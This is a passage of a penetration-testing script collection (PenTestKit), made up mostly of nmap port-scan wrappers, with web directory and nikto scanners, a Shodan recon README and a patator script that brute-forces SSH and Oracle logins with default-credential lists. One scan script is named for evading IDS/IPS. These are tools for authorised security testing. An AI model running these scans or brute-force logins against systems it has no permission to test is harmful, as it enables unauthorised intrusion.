| # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -vv --top-ports 1000 --reason --open -oA udp_ports_full_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/tcp/full/tcp-ports-scan-full-noping-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [[ $EUID -ne 0 ]]; then 25 | echo "Please run this script as root." 1>&2 26 | exit 1 27 | fi 28 | 29 | if [ $# -eq 1 ]; then 30 | nmap -sS -n -Pn -vv -p- --reason --open -oA tcp_ports_full_$1 $1 31 | else 32 | echo "Please provide the target IP address or an IP range." 33 | fi 34 | -------------------------------------------------------------------------------- /port-scanning/tcp/full/tcp-ports-scan-full-fast-noping-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [[ $EUID -ne 0 ]]; then 25 | echo "Please run this script as root." 1>&2 26 | exit 1 27 | fi 28 | 29 | if [ $# -eq 1 ]; then 30 | nmap -sS -n -Pn -vv -p- --reason --open -T4 -oA tcp_ports_full_$1 $1 31 | else 32 | echo "Please provide the target IP address or an IP range." 33 | fi 34 | -------------------------------------------------------------------------------- /port-scanning/tcp/tcp-ports-scan-top1000-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sS -vv --top-ports 1000 -Pn --reason --open -oA tcp_ports_1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/udp/udp-ports-scan-top1000-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -n -vv --top-ports 1000 --reason --open -oA udp_ports_top1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/tcp/tcp-ports-scan-top1000-noping-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sS -n -Pn -vv --top-ports 1000 --reason --open -oA tcp_ports_1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/tcp/tcp-ports-scan-top2000-noping-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sS -n -Pn -vv --top-ports 2000 --reason --open -oA tcp_ports_2000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/udp/udp-ports-scan-top1000-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -vv --top-ports 1000 -Pn --reason --open -oA udp_ports_top1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /web/dir-scanner.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 1 ]; then 26 | LOGNAME="dirb_big_results_$1" 27 | LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g' | sed -r 's/[:]+//g') 28 | LOGNAME="$LOGNAME.txt" 29 | dirb $1 /usr/share/seclists/Discovery/Web-Content/big.txt -l -r -S -o $LOGNAME 30 | else 31 | echo "Please provide the target url." 32 | fi 33 | -------------------------------------------------------------------------------- /web/nikto-scan-useragent-proxy.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 5 ]; then 26 | nikto -ask=no -h $1://$2:$3 -output $1_$2_$3_nikto.html -useragent $4 -useproxy $5 2>&1 | tee "$1_$2_$3_nikto.txt" 27 | else 28 | echo "Please provide the target protocol scheme (http or https), target IP address or hostname, the target port, the user agent string and the proxy server." 29 | fi 30 | -------------------------------------------------------------------------------- /port-scanning/tcp/full/tcp-ports-scan-full-maxrate.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [[ $EUID -ne 0 ]]; then 25 | echo "Please run this script as root." 1>&2 26 | exit 1 27 | fi 28 | 29 | if [ $# -eq 2 ]; then 30 | nmap -sS -vv -p- --reason --open --max-rate $2 -oA tcp_ports_full_maxrate_$1 $1 31 | else 32 | echo "Please provide the target IP address or an IP range and the max rate." 33 | fi 34 | -------------------------------------------------------------------------------- /port-scanning/tcp/tcp-ports-scan-top1000-fast-noping-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2022 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sS -n -Pn -vv --top-ports 1000 --open --reason -T4 -oA tcp_ports_1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/udp/full/udp-ports-scan-full.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -vv -p- --reason --open -oA udp_ports_full_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/udp/udp-ports-scan-top1000-noping-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -n -Pn -vv --top-ports 1000 --reason --open -oA udp_ports_top1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /reconnaissance/shodan/shodanhat/README.md: -------------------------------------------------------------------------------- 1 | # Dependencies 2 | You need to install shodan with pip install shodan or easy_install shodan.
3 | You need to install python-nmap with pip install python-nmap.
4 | You need to set your API Key in the 'constantes.py' file. 5 | 6 | # Options 7 | -h, --help show this help message and exit
8 | -i IP, --ip=IP info about one host
9 | -l LIST, --list=LIST info about a list of hosts
10 | -s SQ, --sq=SQ searchquery string
11 | --nmap perform a nmap scan in the hosts
12 | --setkey=SETKEY set your api key automatically
13 | -r RANGE, --range=RANGE scan a range of ips. ex: 192.168.1.1-192.168.1.255
14 | -o OUTPUT, --output=OUTPUT specify a output file

15 | 16 | Nmap Options:
17 | --sS TCP Syn Scan
18 | --sT TCP Connect Scan
19 | --sU UDP Scan 20 | 21 | # Usage 22 | For One Host
23 | python shodanhat.py -i IP
24 | For a list of Hosts
25 | python shodanhat.py -l list.txt
26 | You can also set a searchquery to make a specific query with '-s' option! 27 | 28 | # ScreenShots 29 |
30 | -------------------------------------------------------------------------------- /port-scanning/udp/full/udp-ports-scan-full-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -n -vv -p- --reason --open -oA udp_ports_full_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /port-scanning/udp/udp-ports-scan-top1000-fast-noping-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -n -Pn -vv --top-ports 1000 --reason --open -T4 -oA udp_ports_top1000_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /grep/grep-list-hosts-and-open-ports-to-csv.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2024 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 1 ]; then 25 | 26 | egrep -v "^#|Status: Up" $1/*.gnmap|cut -d' ' -f2,4-| sed 's/Ignored.*//g' | awk '{printf $1 ";" ; $1=""; for(i=2; i<=NF; i++) { a=a""$i; }; split(a,s,","); for(e in s) { split(s[e],v,"/"); printf "%s,", v[1]}; a=""; printf "\n"; }' 27 | 28 | else 29 | echo "Please provide a directory path." 30 | fi 31 | -------------------------------------------------------------------------------- /port-scanning/udp/full/udp-ports-scan-full-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap -sU -vv -p- -Pn --reason --open -oA udp_ports_full_$1 $1 32 | else 33 | echo "Please provide the target IP address or an IP range." 34 | fi 35 | -------------------------------------------------------------------------------- /web/dir-scanner-gobuster.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2024 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [ $# -eq 2 ]; then 26 | LOGNAME="gobuster_$1" 27 | LOGNAME=$(echo "$LOGNAME" | sed -r 's/[/]+/_/g' | sed -r 's/[.]+/_/g' | sed -r 's/[:]+//g') 28 | LOGNAME="$LOGNAME.txt" 29 | gobuster dir -u $1 -w /usr/share/seclists/Discovery/Web-Content/big.txt -a $2 -e -k -o $LOGNAME 30 | else 31 | echo "Please provide the target URL." 32 | fi 33 | -------------------------------------------------------------------------------- /port-scanning/tcp/full/tcp-ports-scan-full-maxrate-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [[ $EUID -ne 0 ]]; then 25 | echo "Please run this script as root." 1>&2 26 | exit 1 27 | fi 28 | 29 | if [ $# -eq 2 ]; then 30 | nmap -sS -vv -p- -Pn --reason --open --max-rate $2 -oA tcp_ports_full_maxrate_$1 $1 31 | else 32 | echo "Please provide the target IP address or an IP range and the max rate." 33 | fi 34 | -------------------------------------------------------------------------------- /port-scanning/tcp/full/tcp-ports-scan-full-super-fast-noping-nodns.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2023 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [[ $EUID -ne 0 ]]; then 25 | echo "Please run this script as root." 1>&2 26 | exit 1 27 | fi 28 | 29 | if [ $# -eq 1 ]; then 30 | nmap -sS -n -Pn -vv -p- --reason --open -T4 --defeat-rst-ratelimit -oA tcp_ports_full_$1 $1 31 | else 32 | echo "Please provide the target IP address or an IP range." 33 | fi 34 | -------------------------------------------------------------------------------- /port-scanning/tcp/full/tcp-ports-scan-full-with-services-noping-nodns-bypass-ids-ips.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2018 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [[ $EUID -ne 0 ]]; then 25 | echo "Please run this script as root." 1>&2 26 | exit 1 27 | fi 28 | 29 | if [ $# -eq 1 ]; then 30 | nmap -sT -n -Pn -sV -vv -p- --reason --open -T2 -oA tcp_ports_full_$1 $1 31 | else 32 | echo "Please provide the target IP address or an IP range." 33 | fi 34 | -------------------------------------------------------------------------------- /cracking/oracle-login.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | if [ $# -eq 3 ]; then 25 | patator ssh_login host=$1 user=$2 password=FILE0 0=$3 26 | patator oracle_login host=$1 port=$2 user=COMBO00 password=COMBO01 0=/usr/share/seclists/Passwords/Default-Credentials/oracle-betterdefaultpasslist.txt -x ignore:code=ORA-01017 -x ignore:code=ORA-28000 27 | 28 | else 29 | echo "Please provide a target host and a port." 30 | fi 31 | -------------------------------------------------------------------------------- /port-scanning/tcp/services/tcp-services-scan-top1000-noping.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # This file is part of PenTestKit 4 | # Copyright (C) 2017-2020 @maldevel 5 | # https://github.com/maldevel/PenTestKit 6 | # 7 | # PenTestKit - Useful tools for Penetration Testing. 8 | # 9 | # This program is free software: you can redistribute it and/or modify 10 | # it under the terms of the GNU General Public License as published by 11 | # the Free Software Foundation, either version 3 of the License, or 12 | # (at your option) any later version. 13 | # 14 | # This program is distributed in the hope that it will be useful, 15 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 16 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 17 | # GNU General Public License for more details. 18 | # 19 | # You should have received a copy of the GNU General Public License 20 | # along with this program. If not, see . 21 | # 22 | # For more see the file 'LICENSE' for copying permission. 23 | 24 | 25 | if [[ $EUID -ne 0 ]]; then 26 | echo "Please run this script as root." 1>&2 27 | exit 1 28 | fi 29 | 30 | if [ $# -eq 1 ]; then 31 | nmap 